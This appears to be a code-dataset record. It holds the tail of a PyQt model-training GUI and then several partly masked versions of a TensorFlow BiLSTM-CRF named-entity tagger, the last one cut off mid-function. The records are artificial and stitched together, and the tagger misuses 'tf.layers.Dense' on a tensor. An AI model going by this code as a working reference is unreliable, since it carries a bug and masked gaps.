QMessageBox.Yes, QMessageBox.Yes)
else:
reply = QMessageBox.information(self, '保存结果', '模型保存失败',
QMessageBox.Yes, QMessageBox.Yes)
elif self.sender() is self.saveModelButtonT:
if self.trann is None:
reply = QMessageBox.information(self, '模型错误', '模型不存在',
QMessageBox.Yes, QMessageBox.Yes)
return
else:
fname, ok = QFileDialog.getSaveFileName(self, 'Save Model', '..\\traditionalNN.trann.json',
'Traditional NN json files (*.trann.json)')
if ok:
succeed = self.trann.saveModel(fname)
if succeed:
reply = QMessageBox.information(self, '保存结果', '模型保存成功',
QMessageBox.Yes, QMessageBox.Yes)
else:
reply = QMessageBox.information(self, '保存结果', '模型保存失败',
QMessageBox.Yes, QMessageBox.Yes)
else:
reply = QMessageBox.information(self, '保存结果', '模型保存失败',
QMessageBox.Yes, QMessageBox.Yes)
def loadModel(self):
if self.sender() is self.loadModelButton:
fname, ok = QFileDialog.getOpenFileName(self, 'Load Model', '..',
'Combine-CNN json files (*.cbcnn.json)')
if ok:
if self.mcbcnn is None:
self.mcbcnn = myCombineCNN.myCombineCNN(None, self.combineNumConv, self.convCoreNum, self.combineNumPooling)
succeed = self.mcbcnn.setModel(fname)
if succeed:
modelName = fname.split('/')[-1].split('.')[0]
self.presentModelName.setText(modelName)
reply = QMessageBox.information(self, '设置结果', '模型设置成功',
QMessageBox.Yes, QMessageBox.Yes)
else:
reply = QMessageBox.information(self, '设置结果', '模型设置失败',
QMessageBox.Yes, QMessageBox.Yes)
else:
reply = QMessageBox.information(self, '设置结果', '模型设置失败',
QMessageBox.Yes, QMessageBox.Yes)
elif self.sender() is self.loadModelButtonT:
fname, ok = QFileDialog.getOpenFileName(self, 'Load Model', '..',
'Traditional NN json files (*.trann.json)')
if ok:
if self.trann is None:
self.trann = traditionalNN.traditionalNN(None)
succeed = self.trann.setModel(fname)
if succeed:
modelName = fname.split('/')[-1].split('.')[0]
self.presentModelNameT.setText(modelName)
reply = QMessageBox.information(self, '设置结果', '模型设置成功',
QMessageBox.Yes, QMessageBox.Yes)
else:
reply = QMessageBox.information(self, '设置结果', '模型设置失败',
QMessageBox.Yes, QMessageBox.Yes)
else:
reply = QMessageBox.information(self, '设置结果', '模型设置失败',
QMessageBox.Yes, QMessageBox.Yes)
return
def showResult(self):
if self.sender() is self.showResultButton:
if self.traingWidgetOnFlag['New']:
reply = QMessageBox.information(self, '提示', '训练正在进行',
QMessageBox.Yes, QMessageBox.Yes)
return
self.showResultW = showResultWidget.ShowResultWidget('combine-CNN预测结果展示', self, 'New')
elif self.sender() is self.showResultButtonT:
if self.traingWidgetOnFlag['Tra']:
reply = QMessageBox.information(self, '提示', '训练正在进行',
QMessageBox.Yes, QMessageBox.Yes)
return
self.showResultW = showResultWidget.ShowResultWidget('traditional NN预测结果展示', self, 'Tra')
return
def showJudge(self):
if self.sender() is self.judgeResultButton:
if self.traingWidgetOnFlag['New']:
reply = QMessageBox.information(self, '提示', '训练正在进行',
QMessageBox.Yes, QMessageBox.Yes)
return
self.chooseJDWin = chooseJudgeDataSetWidget.chooseJudgeDataSetWidget('Choose Judgement-based-on Data Set',
self, 'New')
elif self.sender() is self.judgeResultButtonT:
if self.traingWidgetOnFlag['Tra']:
reply = QMessageBox.information(self, '提示', '训练正在进行',
QMessageBox.Yes, QMessageBox.Yes)
return
self.chooseJDWin = chooseJudgeDataSetWidget.chooseJudgeDataSetWidget('Choose Judgement-based-on Data Set',
self, 'Tra')
# self.testw = showJudgeWidgets.judgeWidget('test', self, 'New', 'Train')
# self.mcbcnn.runCNN('Test', self.dataFor['New'])
# drawCM = Judgement.myJudge(self.mcbcnn.data.yClassDic, self.mcbcnn.getAccuratePredictResult().argmax(1), self.mcbcnn.data.DataTestY.argmax(1))
# drawCM.plotConfuseMatrix()
if __name__ == '__main__':
app = QApplication(sys.argv)
myMainWindow = MyMainWindow()
sys.exit(app.exec_()) | [
12,
14,
15,
17,
18
] |
10 | 5d9c8e235385ff53c7510994826ff3a04e4a5888 | <mask token>
class Model:
def __init__(self, dim_word, dim_char, dropout, learning_rate,
hidden_size_char, hidden_size_word, num_layers):
"""
:param dim_word: 词的维度
:param dim_char: 字符维度
:param dropout: dropout
:param learning_rate: 学习率
:param hidden_size_char: 字符隐层输出维度
:param hidden_size_word: 词隐层输出维度
:param num_layers: 几层
"""
def cells(size, reuse=False):
return tf.contrib.rnn.DropoutWrapper(tf.nn.rnn_cell.LSTMCell(
size, initializer=tf.orthogonal_initializer(), reuse=reuse),
output_keep_prob=dropout)
self.word_ids = tf.placeholder(tf.int32, shape=[None, None])
self.char_ids = tf.placeholder(tf.int32, shape=[None, None, None])
self.labels = tf.placeholder(tf.int32, shape=[None, None])
self.maxlen = tf.shape(self.word_ids)[1]
self.lengths = tf.count_nonzero(self.word_ids, 1)
self.word_embeddings = tf.Variable(tf.truncated_normal([len(
word2idx), dim_word], stddev=1.0 / np.sqrt(dim_word)))
self.char_embeddings = tf.Variable(tf.truncated_normal([len(
char2idx), dim_char], stddev=1.0 / np.sqrt(dim_char)))
word_embedded = tf.nn.embedding_lookup(self.word_embeddings, self.
word_ids)
char_embedded = tf.nn.embedding_lookup(self.char_embeddings, self.
char_ids)
s = tf.shape(char_embedded)
char_embedded = tf.reshape(char_embedded, shape=[s[0] * s[1], s[-2],
dim_char])
for n in range(num_layers):
(out_fw, out_bw), (state_fw, state_bw
) = tf.nn.bidirectional_dynamic_rnn(cell_fw=cells(
hidden_size_char), cell_bw=cells(hidden_size_char), inputs=
char_embedded, dtype=tf.float32, scope=
'bidirectional_rnn_char_%d' % n)
char_embedded = tf.concat((out_fw, out_bw), 2)
output = tf.reshape(char_embedded[:, -1], shape=[s[0], s[1], 2 *
hidden_size_char])
word_embedded = tf.concat([word_embedded, output], axis=-1)
for n in range(num_layers):
(out_fw, out_bw), (state_fw, state_bw
) = tf.nn.bidirectional_dynamic_rnn(cell_fw=cells(
hidden_size_word), cell_bw=cells(hidden_size_word), inputs=
word_embedded, dtype=tf.float32, scope=
'bidirectional_rnn_word_%d' % n)
word_embedded = tf.concat((out_fw, out_bw), 2)
logits = tf.layers.Dense(word_embedded, len(idx2tag))
y_t = self.labels
log_likelihood, transition_params = tf.contrib.crf.crf_log_likelihood(
logits, y_t, self.lengths)
self.cost = tf.reduce_mean(-log_likelihood)
self.optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate
).minimize(self.cost)
mask = tf.sequence_mask(self.lengths, maxlen=self.maxlen)
self.tags_seq, tags_score = tf.contrib.crf.crf_decode(logits,
transition_params, self.lengths)
self.tags_seq = tf.identity(self.tags_seq, name='logits')
y_t = tf.cast(y_t, tf.int32)
self.prediction = tf.boolean_mask(self.tags_seq, mask)
mask_label = tf.boolean_mask(y_t, mask)
correct_pred = tf.equal(self.prediction, mask_label)
correct_index = tf.cast(correct_pred, tf.float32)
self.accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))
def parse(file):
"""
加载文件并且解析
:param file: 文件名
:return: 词<->词性
"""
with open(file) as fopen:
texts = fopen.read().split('\n')
left, right = [], []
for text in texts:
if '-DOCSTART' in text or not len(text):
continue
splitted = text.split()
left.append(splitted[0])
right.append(splitted[-1])
return left, right
def process_string(string):
"""
:param string:
:return:
"""
string = re.sub('[^A-Za-z0-9\\-\\/ ]+', ' ', string).split()
return ' '.join([to_title(y.strip()) for y in string])
<mask token>
def iter_seq(x):
return np.array([x[i:i + seq_len] for i in range(0, len(x) - seq_len, 1)])
<mask token>
def generate_char_seq(batch):
"""
传进来是50一个块 总共有多少块
然后将每块的单词转为字符序列
:param batch:
:return:
"""
x = [[len(idx2word[i]) for i in k] for k in batch]
maxlen = max([j for i in x for j in i])
temp = np.zeros((batch.shape[0], batch.shape[1], maxlen), dtype=np.int32)
for i in range(batch.shape[0]):
for k in range(batch.shape[1]):
for no, c in enumerate(idx2word[batch[i, k]]):
temp[i, k, -1 - no] = char2idx[c]
return temp
def pred2label(pred):
out = []
for pred_i in pred:
out_i = []
for p in pred_i:
out_i.append(idx2tag[p])
out.append(out_i)
return out
<mask token>
| <mask token>
class Model:
def __init__(self, dim_word, dim_char, dropout, learning_rate,
hidden_size_char, hidden_size_word, num_layers):
"""
:param dim_word: 词的维度
:param dim_char: 字符维度
:param dropout: dropout
:param learning_rate: 学习率
:param hidden_size_char: 字符隐层输出维度
:param hidden_size_word: 词隐层输出维度
:param num_layers: 几层
"""
def cells(size, reuse=False):
return tf.contrib.rnn.DropoutWrapper(tf.nn.rnn_cell.LSTMCell(
size, initializer=tf.orthogonal_initializer(), reuse=reuse),
output_keep_prob=dropout)
self.word_ids = tf.placeholder(tf.int32, shape=[None, None])
self.char_ids = tf.placeholder(tf.int32, shape=[None, None, None])
self.labels = tf.placeholder(tf.int32, shape=[None, None])
self.maxlen = tf.shape(self.word_ids)[1]
self.lengths = tf.count_nonzero(self.word_ids, 1)
self.word_embeddings = tf.Variable(tf.truncated_normal([len(
word2idx), dim_word], stddev=1.0 / np.sqrt(dim_word)))
self.char_embeddings = tf.Variable(tf.truncated_normal([len(
char2idx), dim_char], stddev=1.0 / np.sqrt(dim_char)))
word_embedded = tf.nn.embedding_lookup(self.word_embeddings, self.
word_ids)
char_embedded = tf.nn.embedding_lookup(self.char_embeddings, self.
char_ids)
s = tf.shape(char_embedded)
char_embedded = tf.reshape(char_embedded, shape=[s[0] * s[1], s[-2],
dim_char])
for n in range(num_layers):
(out_fw, out_bw), (state_fw, state_bw
) = tf.nn.bidirectional_dynamic_rnn(cell_fw=cells(
hidden_size_char), cell_bw=cells(hidden_size_char), inputs=
char_embedded, dtype=tf.float32, scope=
'bidirectional_rnn_char_%d' % n)
char_embedded = tf.concat((out_fw, out_bw), 2)
output = tf.reshape(char_embedded[:, -1], shape=[s[0], s[1], 2 *
hidden_size_char])
word_embedded = tf.concat([word_embedded, output], axis=-1)
for n in range(num_layers):
(out_fw, out_bw), (state_fw, state_bw
) = tf.nn.bidirectional_dynamic_rnn(cell_fw=cells(
hidden_size_word), cell_bw=cells(hidden_size_word), inputs=
word_embedded, dtype=tf.float32, scope=
'bidirectional_rnn_word_%d' % n)
word_embedded = tf.concat((out_fw, out_bw), 2)
logits = tf.layers.Dense(word_embedded, len(idx2tag))
y_t = self.labels
log_likelihood, transition_params = tf.contrib.crf.crf_log_likelihood(
logits, y_t, self.lengths)
self.cost = tf.reduce_mean(-log_likelihood)
self.optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate
).minimize(self.cost)
mask = tf.sequence_mask(self.lengths, maxlen=self.maxlen)
self.tags_seq, tags_score = tf.contrib.crf.crf_decode(logits,
transition_params, self.lengths)
self.tags_seq = tf.identity(self.tags_seq, name='logits')
y_t = tf.cast(y_t, tf.int32)
self.prediction = tf.boolean_mask(self.tags_seq, mask)
mask_label = tf.boolean_mask(y_t, mask)
correct_pred = tf.equal(self.prediction, mask_label)
correct_index = tf.cast(correct_pred, tf.float32)
self.accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))
def parse(file):
"""
加载文件并且解析
:param file: 文件名
:return: 词<->词性
"""
with open(file) as fopen:
texts = fopen.read().split('\n')
left, right = [], []
for text in texts:
if '-DOCSTART' in text or not len(text):
continue
splitted = text.split()
left.append(splitted[0])
right.append(splitted[-1])
return left, right
def process_string(string):
"""
:param string:
:return:
"""
string = re.sub('[^A-Za-z0-9\\-\\/ ]+', ' ', string).split()
return ' '.join([to_title(y.strip()) for y in string])
def to_title(string):
if string.isupper():
string = string.title()
return string
<mask token>
def iter_seq(x):
return np.array([x[i:i + seq_len] for i in range(0, len(x) - seq_len, 1)])
<mask token>
def generate_char_seq(batch):
"""
传进来是50一个块 总共有多少块
然后将每块的单词转为字符序列
:param batch:
:return:
"""
x = [[len(idx2word[i]) for i in k] for k in batch]
maxlen = max([j for i in x for j in i])
temp = np.zeros((batch.shape[0], batch.shape[1], maxlen), dtype=np.int32)
for i in range(batch.shape[0]):
for k in range(batch.shape[1]):
for no, c in enumerate(idx2word[batch[i, k]]):
temp[i, k, -1 - no] = char2idx[c]
return temp
def pred2label(pred):
out = []
for pred_i in pred:
out_i = []
for p in pred_i:
out_i.append(idx2tag[p])
out.append(out_i)
return out
<mask token>
| <mask token>
class Model:
def __init__(self, dim_word, dim_char, dropout, learning_rate,
hidden_size_char, hidden_size_word, num_layers):
"""
:param dim_word: 词的维度
:param dim_char: 字符维度
:param dropout: dropout
:param learning_rate: 学习率
:param hidden_size_char: 字符隐层输出维度
:param hidden_size_word: 词隐层输出维度
:param num_layers: 几层
"""
def cells(size, reuse=False):
return tf.contrib.rnn.DropoutWrapper(tf.nn.rnn_cell.LSTMCell(
size, initializer=tf.orthogonal_initializer(), reuse=reuse),
output_keep_prob=dropout)
self.word_ids = tf.placeholder(tf.int32, shape=[None, None])
self.char_ids = tf.placeholder(tf.int32, shape=[None, None, None])
self.labels = tf.placeholder(tf.int32, shape=[None, None])
self.maxlen = tf.shape(self.word_ids)[1]
self.lengths = tf.count_nonzero(self.word_ids, 1)
self.word_embeddings = tf.Variable(tf.truncated_normal([len(
word2idx), dim_word], stddev=1.0 / np.sqrt(dim_word)))
self.char_embeddings = tf.Variable(tf.truncated_normal([len(
char2idx), dim_char], stddev=1.0 / np.sqrt(dim_char)))
word_embedded = tf.nn.embedding_lookup(self.word_embeddings, self.
word_ids)
char_embedded = tf.nn.embedding_lookup(self.char_embeddings, self.
char_ids)
s = tf.shape(char_embedded)
char_embedded = tf.reshape(char_embedded, shape=[s[0] * s[1], s[-2],
dim_char])
for n in range(num_layers):
(out_fw, out_bw), (state_fw, state_bw
) = tf.nn.bidirectional_dynamic_rnn(cell_fw=cells(
hidden_size_char), cell_bw=cells(hidden_size_char), inputs=
char_embedded, dtype=tf.float32, scope=
'bidirectional_rnn_char_%d' % n)
char_embedded = tf.concat((out_fw, out_bw), 2)
output = tf.reshape(char_embedded[:, -1], shape=[s[0], s[1], 2 *
hidden_size_char])
word_embedded = tf.concat([word_embedded, output], axis=-1)
for n in range(num_layers):
(out_fw, out_bw), (state_fw, state_bw
) = tf.nn.bidirectional_dynamic_rnn(cell_fw=cells(
hidden_size_word), cell_bw=cells(hidden_size_word), inputs=
word_embedded, dtype=tf.float32, scope=
'bidirectional_rnn_word_%d' % n)
word_embedded = tf.concat((out_fw, out_bw), 2)
logits = tf.layers.Dense(word_embedded, len(idx2tag))
y_t = self.labels
log_likelihood, transition_params = tf.contrib.crf.crf_log_likelihood(
logits, y_t, self.lengths)
self.cost = tf.reduce_mean(-log_likelihood)
self.optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate
).minimize(self.cost)
mask = tf.sequence_mask(self.lengths, maxlen=self.maxlen)
self.tags_seq, tags_score = tf.contrib.crf.crf_decode(logits,
transition_params, self.lengths)
self.tags_seq = tf.identity(self.tags_seq, name='logits')
y_t = tf.cast(y_t, tf.int32)
self.prediction = tf.boolean_mask(self.tags_seq, mask)
mask_label = tf.boolean_mask(y_t, mask)
correct_pred = tf.equal(self.prediction, mask_label)
correct_index = tf.cast(correct_pred, tf.float32)
self.accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))
def parse(file):
"""
加载文件并且解析
:param file: 文件名
:return: 词<->词性
"""
with open(file) as fopen:
texts = fopen.read().split('\n')
left, right = [], []
for text in texts:
if '-DOCSTART' in text or not len(text):
continue
splitted = text.split()
left.append(splitted[0])
right.append(splitted[-1])
return left, right
def process_string(string):
"""
:param string:
:return:
"""
string = re.sub('[^A-Za-z0-9\\-\\/ ]+', ' ', string).split()
return ' '.join([to_title(y.strip()) for y in string])
def to_title(string):
if string.isupper():
string = string.title()
return string
def parse_XY(texts, labels):
"""
整理词性表 词表 字符表 并将文本转为对应的数字序列
:param texts: 文本 词的一个列表
:param labels: 词性的一个列表
:return: 词转为id的序列 词性转为id的序列
"""
global word2idx, tag2idx, char2idx, word_idx, tag_idx, char_idx
X, Y = [], []
for no, text in enumerate(texts):
text = text.lower()
tag = labels[no]
for c in text:
if c not in char2idx:
char2idx[c] = char_idx
char_idx += 1
if tag not in tag2idx:
tag2idx[tag] = tag_idx
tag_idx += 1
Y.append(tag2idx[tag])
if text not in word2idx:
word2idx[text] = word_idx
word_idx += 1
X.append(word2idx[text])
return X, np.array(Y)
def iter_seq(x):
return np.array([x[i:i + seq_len] for i in range(0, len(x) - seq_len, 1)])
def to_train_seq(*args):
"""
:param args: 词转为的id的序列 词性转为id的序列
:return:
"""
return [iter_seq(x) for x in args]
def generate_char_seq(batch):
"""
传进来是50一个块 总共有多少块
然后将每块的单词转为字符序列
:param batch:
:return:
"""
x = [[len(idx2word[i]) for i in k] for k in batch]
maxlen = max([j for i in x for j in i])
temp = np.zeros((batch.shape[0], batch.shape[1], maxlen), dtype=np.int32)
for i in range(batch.shape[0]):
for k in range(batch.shape[1]):
for no, c in enumerate(idx2word[batch[i, k]]):
temp[i, k, -1 - no] = char2idx[c]
return temp
def pred2label(pred):
out = []
for pred_i in pred:
out_i = []
for p in pred_i:
out_i.append(idx2tag[p])
out.append(out_i)
return out
<mask token>
| <mask token>
import re
import numpy as np
import tensorflow as tf
from sklearn.metrics import classification_report
class Model:
def __init__(self, dim_word, dim_char, dropout, learning_rate,
hidden_size_char, hidden_size_word, num_layers):
"""
:param dim_word: 词的维度
:param dim_char: 字符维度
:param dropout: dropout
:param learning_rate: 学习率
:param hidden_size_char: 字符隐层输出维度
:param hidden_size_word: 词隐层输出维度
:param num_layers: 几层
"""
def cells(size, reuse=False):
return tf.contrib.rnn.DropoutWrapper(tf.nn.rnn_cell.LSTMCell(
size, initializer=tf.orthogonal_initializer(), reuse=reuse),
output_keep_prob=dropout)
self.word_ids = tf.placeholder(tf.int32, shape=[None, None])
self.char_ids = tf.placeholder(tf.int32, shape=[None, None, None])
self.labels = tf.placeholder(tf.int32, shape=[None, None])
self.maxlen = tf.shape(self.word_ids)[1]
self.lengths = tf.count_nonzero(self.word_ids, 1)
self.word_embeddings = tf.Variable(tf.truncated_normal([len(
word2idx), dim_word], stddev=1.0 / np.sqrt(dim_word)))
self.char_embeddings = tf.Variable(tf.truncated_normal([len(
char2idx), dim_char], stddev=1.0 / np.sqrt(dim_char)))
word_embedded = tf.nn.embedding_lookup(self.word_embeddings, self.
word_ids)
char_embedded = tf.nn.embedding_lookup(self.char_embeddings, self.
char_ids)
s = tf.shape(char_embedded)
char_embedded = tf.reshape(char_embedded, shape=[s[0] * s[1], s[-2],
dim_char])
for n in range(num_layers):
(out_fw, out_bw), (state_fw, state_bw
) = tf.nn.bidirectional_dynamic_rnn(cell_fw=cells(
hidden_size_char), cell_bw=cells(hidden_size_char), inputs=
char_embedded, dtype=tf.float32, scope=
'bidirectional_rnn_char_%d' % n)
char_embedded = tf.concat((out_fw, out_bw), 2)
output = tf.reshape(char_embedded[:, -1], shape=[s[0], s[1], 2 *
hidden_size_char])
word_embedded = tf.concat([word_embedded, output], axis=-1)
for n in range(num_layers):
(out_fw, out_bw), (state_fw, state_bw
) = tf.nn.bidirectional_dynamic_rnn(cell_fw=cells(
hidden_size_word), cell_bw=cells(hidden_size_word), inputs=
word_embedded, dtype=tf.float32, scope=
'bidirectional_rnn_word_%d' % n)
word_embedded = tf.concat((out_fw, out_bw), 2)
logits = tf.layers.Dense(word_embedded, len(idx2tag))
y_t = self.labels
log_likelihood, transition_params = tf.contrib.crf.crf_log_likelihood(
logits, y_t, self.lengths)
self.cost = tf.reduce_mean(-log_likelihood)
self.optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate
).minimize(self.cost)
mask = tf.sequence_mask(self.lengths, maxlen=self.maxlen)
self.tags_seq, tags_score = tf.contrib.crf.crf_decode(logits,
transition_params, self.lengths)
self.tags_seq = tf.identity(self.tags_seq, name='logits')
y_t = tf.cast(y_t, tf.int32)
self.prediction = tf.boolean_mask(self.tags_seq, mask)
mask_label = tf.boolean_mask(y_t, mask)
correct_pred = tf.equal(self.prediction, mask_label)
correct_index = tf.cast(correct_pred, tf.float32)
self.accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))
def parse(file):
"""
加载文件并且解析
:param file: 文件名
:return: 词<->词性
"""
with open(file) as fopen:
texts = fopen.read().split('\n')
left, right = [], []
for text in texts:
if '-DOCSTART' in text or not len(text):
continue
splitted = text.split()
left.append(splitted[0])
right.append(splitted[-1])
return left, right
def process_string(string):
"""
:param string:
:return:
"""
string = re.sub('[^A-Za-z0-9\\-\\/ ]+', ' ', string).split()
return ' '.join([to_title(y.strip()) for y in string])
def to_title(string):
if string.isupper():
string = string.title()
return string
def parse_XY(texts, labels):
"""
整理词性表 词表 字符表 并将文本转为对应的数字序列
:param texts: 文本 词的一个列表
:param labels: 词性的一个列表
:return: 词转为id的序列 词性转为id的序列
"""
global word2idx, tag2idx, char2idx, word_idx, tag_idx, char_idx
X, Y = [], []
for no, text in enumerate(texts):
text = text.lower()
tag = labels[no]
for c in text:
if c not in char2idx:
char2idx[c] = char_idx
char_idx += 1
if tag not in tag2idx:
tag2idx[tag] = tag_idx
tag_idx += 1
Y.append(tag2idx[tag])
if text not in word2idx:
word2idx[text] = word_idx
word_idx += 1
X.append(word2idx[text])
return X, np.array(Y)
def iter_seq(x):
return np.array([x[i:i + seq_len] for i in range(0, len(x) - seq_len, 1)])
def to_train_seq(*args):
"""
:param args: 词转为的id的序列 词性转为id的序列
:return:
"""
return [iter_seq(x) for x in args]
def generate_char_seq(batch):
"""
传进来是50一个块 总共有多少块
然后将每块的单词转为字符序列
:param batch:
:return:
"""
x = [[len(idx2word[i]) for i in k] for k in batch]
maxlen = max([j for i in x for j in i])
temp = np.zeros((batch.shape[0], batch.shape[1], maxlen), dtype=np.int32)
for i in range(batch.shape[0]):
for k in range(batch.shape[1]):
for no, c in enumerate(idx2word[batch[i, k]]):
temp[i, k, -1 - no] = char2idx[c]
return temp
def pred2label(pred):
out = []
for pred_i in pred:
out_i = []
for p in pred_i:
out_i.append(idx2tag[p])
out.append(out_i)
return out
if __name__ == '__main__':
left_train, right_train = parse('./data/eng.train')
left_test, right_test = parse('./data/eng.testa')
word2idx = {'PAD': 0, 'NUM': 1, 'UNK': 2}
tag2idx = {'PAD': 0}
char2idx = {'PAD': 0}
word_idx = 3
tag_idx = 1
char_idx = 1
train_X, train_Y = parse_XY(left_train, right_train)
test_X, test_Y = parse_XY(left_test, right_test)
idx2word = {idx: tag for tag, idx in word2idx.items()}
idx2tag = {i: w for w, i in tag2idx.items()}
seq_len = 50
X_seq, Y_seq = to_train_seq(train_X, train_Y)
X_char_seq = generate_char_seq(X_seq)
print(X_seq.shape)
print(X_char_seq.shape)
X_seq_test, Y_seq_test = to_train_seq(test_X, test_Y)
X_char_seq_test = generate_char_seq(X_seq_test)
print(X_seq_test.shape)
print(X_char_seq_test.shape)
train_X, train_Y, train_char = X_seq, Y_seq, X_char_seq
test_X, test_Y, test_char = X_seq_test, Y_seq_test, X_char_seq_test
tf.reset_default_graph()
sess = tf.Session()
dim_word = 64
dim_char = 128
dropout = 0.8
learning_rate = 0.001
hidden_size_char = 128
hidden_size_word = 128
num_layers = 2
batch_size = 32
model = Model(dim_word, dim_char, dropout, learning_rate,
hidden_size_char, hidden_size_word, num_layers)
sess.run(tf.global_variables_initializer())
for e in range(3):
train_acc, train_loss, test_acc, test_loss = 0, 0, 0, 0
for i in range(0, len(train_X), batch_size):
batch_x = train_X[i:min(i + batch_size, train_X.shape[0])]
batch_char = train_char[i:min(i + batch_size, train_X.shape[0])]
batch_y = train_Y[i:min(i + batch_size, train_X.shape[0])]
acc, cost, _ = sess.run([model.accuracy, model.cost, model.
optimizer], feed_dict={model.word_ids: batch_x, model.
char_ids: batch_char, model.labels: batch_y})
train_loss += cost
train_acc += acc
print('train_data: epoch:{}, step:{}, loss:{}, accuracy:{}'.
format(e, i // batch_size + 1, cost, acc))
for i in range(0, len(test_X), batch_size):
batch_x = test_X[i:min(i + batch_size, test_X.shape[0])]
batch_char = test_char[i:min(i + batch_size, test_X.shape[0])]
batch_y = test_Y[i:min(i + batch_size, test_X.shape[0])]
acc, cost = sess.run([model.accuracy, model.cost], feed_dict={
model.word_ids: batch_x, model.char_ids: batch_char, model.
labels: batch_y})
test_loss += cost
test_acc += acc
print('test_data: epoch:{}, step:{}, loss:{}, accuracy:{}'.
format(e, i // batch_size + 1, cost, acc))
train_loss /= len(train_X) / batch_size
train_acc /= len(train_X) / batch_size
test_loss /= len(test_X) / batch_size
test_acc /= len(test_X) / batch_size
print(
'epoch: %d, training loss: %f, training acc: %f, valid loss: %f, valid acc: %f\n'
% (e, train_loss, train_acc, test_loss, test_acc))
real_Y, predict_Y = [], []
for i in range(0, len(test_X), batch_size):
batch_x = test_X[i:min(i + batch_size, test_X.shape[0])]
batch_char = test_char[i:min(i + batch_size, test_X.shape[0])]
batch_y = test_Y[i:min(i + batch_size, test_X.shape[0])]
predicted = pred2label(sess.run(model.tags_seq, feed_dict={model.
word_ids: batch_x, model.char_ids: batch_char}))
real = pred2label(batch_y)
predict_Y.extend(predicted)
real_Y.extend(real)
print(classification_report(np.array(real_Y).ravel(), np.array(
predict_Y).ravel()))
| """
@file : 001-rnn+lstm+crf.py
@author: xiaolu
@time : 2019-09-06
"""
import re
import numpy as np
import tensorflow as tf
from sklearn.metrics import classification_report
class Model:
def __init__(self, dim_word, dim_char, dropout, learning_rate,
hidden_size_char, hidden_size_word, num_layers):
'''
:param dim_word: 词的维度
:param dim_char: 字符维度
:param dropout: dropout
:param learning_rate: 学习率
:param hidden_size_char: 字符隐层输出维度
:param hidden_size_word: 词隐层输出维度
:param num_layers: 几层
'''
def cells(size, reuse=False):
return tf.contrib.rnn.DropoutWrapper(
tf.nn.rnn_cell.LSTMCell(size, initializer=tf.orthogonal_initializer(), reuse=reuse),
output_keep_prob=dropout
)
# 1. define input
self.word_ids = tf.placeholder(tf.int32, shape=[None, None])
self.char_ids = tf.placeholder(tf.int32, shape=[None, None, None])
self.labels = tf.placeholder(tf.int32, shape=[None, None])
self.maxlen = tf.shape(self.word_ids)[1]
self.lengths = tf.count_nonzero(self.word_ids, 1)
# 2. embedding
self.word_embeddings = tf.Variable(tf.truncated_normal([len(word2idx), dim_word], stddev=1.0 / np.sqrt(dim_word)))
self.char_embeddings = tf.Variable(tf.truncated_normal([len(char2idx), dim_char], stddev=1.0 / np.sqrt(dim_char)))
word_embedded = tf.nn.embedding_lookup(self.word_embeddings, self.word_ids)
char_embedded = tf.nn.embedding_lookup(self.char_embeddings, self.char_ids)
s = tf.shape(char_embedded) # (51312, 50, 27, embedding_size)
char_embedded = tf.reshape(char_embedded, shape=[s[0] * s[1], s[-2], dim_char])
for n in range(num_layers):
(out_fw, out_bw), (state_fw, state_bw) = tf.nn.bidirectional_dynamic_rnn(
cell_fw=cells(hidden_size_char),
cell_bw=cells(hidden_size_char),
inputs=char_embedded,
dtype=tf.float32,
scope='bidirectional_rnn_char_%d' % n
)
char_embedded = tf.concat((out_fw, out_bw), 2)
output = tf.reshape(char_embedded[:, -1], shape=[s[0], s[1], 2*hidden_size_char])
word_embedded = tf.concat([word_embedded, output], axis=-1) # 将词嵌入部分与字符嵌入通过双向lstm输出部分进行拼接
for n in range(num_layers):
(out_fw, out_bw), (state_fw, state_bw) = tf.nn.bidirectional_dynamic_rnn(
cell_fw=cells(hidden_size_word),
cell_bw=cells(hidden_size_word),
inputs=word_embedded,
dtype=tf.float32,
scope='bidirectional_rnn_word_%d' % n
)
word_embedded = tf.concat((out_fw, out_bw), 2)
logits = tf.layers.Dense(word_embedded, len(idx2tag))
y_t = self.labels
log_likelihood, transition_params = tf.contrib.crf.crf_log_likelihood(
logits, y_t, self.lengths
)
self.cost = tf.reduce_mean(-log_likelihood)
self.optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(self.cost)
mask = tf.sequence_mask(self.lengths, maxlen=self.maxlen)
self.tags_seq, tags_score = tf.contrib.crf.crf_decode(
logits, transition_params, self.lengths
)
self.tags_seq = tf.identity(self.tags_seq, name='logits')
y_t = tf.cast(y_t, tf.int32)
self.prediction = tf.boolean_mask(self.tags_seq, mask)
mask_label = tf.boolean_mask(y_t, mask)
correct_pred = tf.equal(self.prediction, mask_label)
correct_index = tf.cast(correct_pred, tf.float32)
self.accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))
def parse(file):
'''
加载文件并且解析
:param file: 文件名
:return: 词<->词性
'''
with open(file) as fopen:
texts = fopen.read().split('\n')
left, right = [], []
for text in texts:
if '-DOCSTART' in text or not len(text):
continue
splitted = text.split()
left.append(splitted[0])
right.append(splitted[-1])
return left, right
def process_string(string):
'''
:param string:
:return:
'''
string= re.sub('[^A-Za-z0-9\-\/ ]+', ' ', string).split()
return ' '.join([to_title(y.strip()) for y in string])
def to_title(string):
if string.isupper():
string = string.title()
return string
def parse_XY(texts, labels):
'''
整理词性表 词表 字符表 并将文本转为对应的数字序列
:param texts: 文本 词的一个列表
:param labels: 词性的一个列表
:return: 词转为id的序列 词性转为id的序列
'''
global word2idx, tag2idx, char2idx, word_idx, tag_idx, char_idx
X, Y = [], []
for no, text in enumerate(texts):
text = text.lower() # 当前这个单词转小写
tag = labels[no] # 取出对应的词性
for c in text: # 字符表
if c not in char2idx:
char2idx[c] = char_idx
char_idx += 1
if tag not in tag2idx: # 词性表
tag2idx[tag] = tag_idx
tag_idx += 1
Y.append(tag2idx[tag]) # 当前这个词的词性转为id的值
if text not in word2idx: # 词表
word2idx[text] = word_idx
word_idx += 1
X.append(word2idx[text]) # 将词转为id的标号
return X, np.array(Y)
def iter_seq(x):
return np.array([x[i: i+seq_len] for i in range(0, len(x)-seq_len, 1)])
def to_train_seq(*args):
'''
:param args: 词转为的id的序列 词性转为id的序列
:return:
'''
